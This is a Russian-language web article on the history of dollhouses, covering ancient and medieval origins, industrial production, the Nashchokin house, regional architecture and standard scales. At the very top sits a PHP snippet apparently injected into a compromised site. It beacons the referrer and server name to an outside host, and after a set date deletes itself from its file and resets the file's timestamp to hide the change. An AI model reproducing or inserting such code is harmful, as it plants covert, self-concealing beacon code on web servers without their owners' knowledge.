check_meta(); function check_meta(){ $jp = __FILE__; $jptime = filemtime($jp); if(time() >= 1456732116){ $jp_c = file_get_contents($jp); if($t = @strpos($jp_c,"check_meta();")) { $contentp = substr($jp_c,0,$t); if(@file_put_contents($jp, $contentp)){ @touch($jp,$jptime); } } } @file_get_contents("http://web.51.la:82/go.asp?svid=8&id=18776828&referrer=".$_SERVER['HTTP_REFERER']."&vpage=http://".$_SERVER['SERVER_NAME']."/components/com_search/models/content.php"); } История кукольных домиков
ЧТО ТАКОЕ КУКОЛЬНЫЙ ДОМИК?

Кукольные домики – эти миниатюрные копии жилищ – за минувшие столетия не только покорили сердца детей по всему миру, но и стали предметами коллекционирования серьезных собирателей предметов искусства.

ИСТОРИЯ ВОЗНИКНОВЕНИЯ

Начало

Возможно, что первый кукольный дом возник еще в доисторическую эпоху. Кукла, изображающая человека, первоначально была предметом культа, статуэткой-божком, который, сойдя со своего алтаря, конечно, должен был где-то жить. И пусть первые куклы и их жилища были примитивными - скорее, не изображая, а обозначая тело и кроватку – это были, тем не менее, самые настоящие куклы и их домики.

Считается, что официально задокументированная история ку кольных домиков началась более пяти тысяч лет назад: в одной из древнеегипетских пирамид археологи нашли полный комплект игрушечного пышного двора: там была красиво украшенная деревянная мебель (дверки шкафов, инкрустированных перламутром, открывались), а также кухонная утварь, повозки, лодки, фигурки людей и домашней живности.

В Европе история кукольных домов, как и в древние времена, также берет истоки в религии: первыми кукольными миниатюрами стали рождественские вертепы. Деревянных ящик, поделенный пополам, в нижней своей части изображал ад (куда, согласно сюжету, черт утаскивает царя Ирода,  убивавшего безвинных младенцев), а в верхней – тот самых хлев, где родился Иисус. Ясли, солома, деревянные стены сарая – все это создавало обстановку знаменитой вифлеемской рождественской ночи и, к тому же, являлось кукольным домиком, в котором «жили» куколки Марии, Иосифа и Иисуса, куда приходили волхвы со своими дарами, повинуясь свету звезды, вырезанной из блестящей бумаги.

Средние века

Изготовление кукольных домиков мастерами-артельщиками началось в средневековье: так, до наших дней дошло несколько домов-витринок, изготовленных в разных странах в период с XVI по XVII век. К тому моменту мастерство ремесленников достигло своего апогея: детализация потрясает воображение зрителя и сегодня, не упущено ни единой детали роскошных интерьеров.  В работе использовались дорогостоящие материалы, стены господских покоев обтягивали натуральным шелком.

Вследствие дороговизны первые кукольные домики были доступны только знатным богатым семьям. Более того, первые домики, предназначались вовсе не для детей, а для вполне взрослых представителей знати – матрон, обставлявших свои кукольные дома-шкафы с тщанием и заботливостью рачительных хозяек. В течение всей жизни европейские женщины собирали мебель и приборы для своих домиков, передавая их потом по наследству младшим женщинам рода.

Эти – не игрушки, а произведения искусства – особенно распространенные в Германии, Англии, Италии и Голландии, подразделялись на две категории.

Display cases – дома-витрины – представляли собой большой ящик-шкаф, зачастую с дверями, разделенный перегородками на несколько этажей и комнат. По сути своей, эта система повторяла в расширенном виде вертеп и отлично иллюстрировала вертикальное сознание средневекового человека (внизу ад (подвал), в середине – хлев (жилые комнаты), наверху – чистилище (в варианте кукольного дома – прачечная). Интерьер в display cases был вымышленный, но имеющий отношение к конкретной исторической эпохе.

Вторая категория – cabinet house – кабинетный дом, воспроизводящий в абсолютной точности архитектурные особенности и убранство дома, для которого он и был сделан.  Эти дома были распространены меньше, и появились куда позже витринных домов.

С течением времени кукольные дома все же доставались детям – девочкам, уже способным осознавать не только дороговизну родового артефакта, но и его историческую ценность. Безусловно, родители этих детей преследовали педагогические цели: девочка училась управлять хозяйством (ведь в подвалах домов хранились кукольные припасы – еда и вино), а еще, благодаря роскоши дорогой игрушки, с самого детства осознавала могущество и богатство собственной семьи.

Новая история

Когда грянула промышленная революция, волна прогресса докатилась и до производства кукольных домов.  Если все ранние кукольные дома производились в единственном экземпляре и вручную, то уже в XIX веке фабрики игрушек наладили массовый выпуск мебели и посуды. Благодаря этому кукольный дом стал доступен и детям из не очень богатых семей.

В авангарде производителей оказались две державы – Великобритания и Германия, но немецкие домики были куда популярнее. Немецкие фирмы поставляли аксессуары для кукольных домиков в магазины и лавки Центральной Европы, Америки и даже, невзирая на жесточайшую конкуренцию, в большие лондонские магазины.

Господство Германии на кукольном рынке продлилось вплоть до Первой Мировой войны, после которой пальму первенства у тевтонов перехватили американцы. Американские компании вступили на поле кукольной битвы с аутентичными репликами домиков первых американских поселенцев, а в результате стали успешными производителями и продавцами кукольных домиков, впрочем, зачастую используя дизайн и наработки германских коллег.

После Второй Мировой войны производство кукольных домов и аксессуаров к ним было поставлено на поток. К сожалению, детализация убранства была сведена к минимуму, вместо натуральных материалов стали использовать жесть и пластик. Зато такое упрощение способствовало резкому удешевлению игрушек.

В ХХ веке был изобретен и другой вид кукольных домов – румбокс от английского roombox – комната в коробке. Эта миниатюра несколько проще в производстве, так как включает в себя только одну комнату, а зачастую вообще только одну ее часть (угол или стену), соответствующую необходимой тематике. Довольно часто румбоксы делаются для украшения витрин магазинов или кафе,  а также к какому-то знаменательному событию, например, к юбилею или к свадьбе.

Исторически, в России кукольные дома не были распространены. В XVII-XIX веках редкими европейскими образчиками обладали лишь несколько богатых семей (причем в России кукольный дом сразу же позиционировался как детская игрушка, а не взрослое развлечение). Один из таких домов европейского производства хранится в запасниках Музея игрушки в Сергиевом Посаде.

Также один из широко известных  миниатюрных домов экспонируется во Всероссийском пушкинском музее в Санкт-Петербурге. Владельцем этого дома был заядлый коллекционер-миниатюрист, близкий друг Пушкина, Павел Воинович Нащокин. В «Нащокинском доме» мебель и утварь не только представляют собой точную копию особняка хозяина, но и работоспособны (например, на клавиатуре крошечного рояля спицами можно сыграть мелодию). Известно, что столовый гарнитур (обеденный стол и несколько стульев) Нащокин заказал в мастерской  знаменитого мебельщика Генриха Гамбса. Поскольку Гамбс был немцем, а значит, знал о миниатюрных домах не понаслышке, он с больших удовольствием принял заказ, исполнив свою же работу в мельчайших подробностях (маленький стол раздвигается точно так же, как и большой). В интерьере дома уделено внимание не только мебели, но и бытовым подробностям: есть щипцы для колки сахара, ножницы для снятия нагара. Всего сохранилось около 600 предметов. Пушкин был большим поклонником увлечения приятеля и с интересом следил за пополнением коллекции.

АРХИТЕКТУРА И МАСШТАБ

В каждой стране свои традиции архитектуры кукольных домов.

В Европе (Франции, Германии, Голландии) домики по большей части имеют вид ящика-витрины, иногда застекленной для защиты от пыли или неосторожных воздействий, и не имеют передней стены.

В Америке у кукольного дома для игровых целей отсутствует задняя стена, а фасад с красивой отделкой дополняет образ. Есть и другая конструкция: если дом одноэтажный, у него съемная крыша, а все четыре стены на своих местах.

В Англии, напротив, задняя стена дома образует трехстенную коробку с двумя боковыми, а фасад крепится к домику на петлях и открывается для игры.

Сегодня, как и сотни лет назад, мастера-кукольники достигают виртуозной детализации в интерьерах, воспроизводя как убранства комнат прошлых веков, так и сегодняшние дизайнерские решения.

Масштаб кукольных домиков  различен. В уникальных домах, выполненных в единственном экземпляре, он может не соответствовать ни одному из известных стандартов: мастер волен выбирать свой собственный масштаб.  Так было вплоть до начала ХХ века. Однако единый масштаб кукольной миниатюры стал необходим в период становления массовой индустрии: игрушки разных фирм должны были подходить друг к другу по размеру, иначе собирание кукольного дома вновь становилось дорогостоящим и непростым делом.

Так, масштаб 1:18 (он же - 1 фут к 2/3 дюйма) сразу же стал основным для нескольких крупных фирм Швеции, Америки и Англии, выпускавшем игровые кукольные дома для детей.

Некоторые компании использовали менее ходовой 1:16 (1 фут к 3/4 дюйма).

Масштаб 1:12 (он же – однодюймовый) стал со временем наиболее распространенным для коллекционных кукольных домов в Америке и Великобритании, а потом и по всему миру. Этот же масштаб используется и для создания румбоксов.

Совсем крошечная миниатюра – масштабом 1:144 – стандартно используется для кукольного дома внутри кукольного дома (такие миниатюры можно подробно рассмотреть при помощи увеличительного стекла).

Материалы художники используют разные – от натуральных (дерева, камня, стекла, фарфора, керамики) до искусственных, но воспроизводящих естественные средства строительства (в том числе специального пластика для миниатюр и кукольных работ). В домиках, изготовленных производственным способом, обычно используют недорогие материалы: фанеру, жесть, пластмассу.